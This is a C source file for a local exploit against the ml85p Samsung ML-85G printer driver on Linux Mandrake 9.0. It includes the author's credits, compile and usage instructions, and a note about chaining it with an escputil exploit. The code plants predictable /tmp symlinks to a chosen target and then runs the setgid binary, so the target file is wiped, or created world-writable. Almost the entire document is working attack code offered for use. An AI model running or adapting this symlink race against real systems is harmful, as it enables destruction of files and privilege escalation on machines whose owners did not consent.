/*

Linux Mandrake 9.0/x86 local exploit for ml85p.
Ml85p doesn't have execute permission for othets, so
to exploit it you need to be in sys or root group.
You can gain egid=3(sys) through escputil exploit.
If file exists it will be cleaned, if file doesn't 
exist it will be created with 666( devil ;))  perms.

Karol Wiêsek [appelast-at-bsquad.sm.pl]

compile: 	gcc -o ml85p ml85p_ex.c
usage:		./ml85p <file_to_clean/create>

*/

#include <unistd.h>
#include <stdio.h>

#define VULN_PROG "/usr/bin/ml85p"

int main(int argc, char *argv[])
{
    int tajm, i;
    char *filename, *destfile;

    fprintf(stderr,"\nLocal exploit for Samsung ML-85G laser printer\n");
    fprintf(stderr,"Bug found and exploit written by appelast [appelast-at-bsquad.sm.pl]\n");

    if (argc<2)
	{
        fprintf(stderr,"\nUsage : %s <file to clean/create>\n", argv[0]);
	return 0;
	}
    (void *)filename = malloc(50,0);
    (void *)destfile = malloc(50,0);
    destfile =  argv[1];
    
    tajm = time(NULL);
    
    for (i=0; i<3; i++)
	{
        sprintf(filename,"/tmp/ml85g%d",tajm+i);
	symlink(destfile, filename);
        }

    fprintf(stderr,"\nPress a key to clean/create %s file", destfile);
    umask(000);
    execl(VULN_PROG,VULN_PROG,"-s",NULL);

    return 0;
}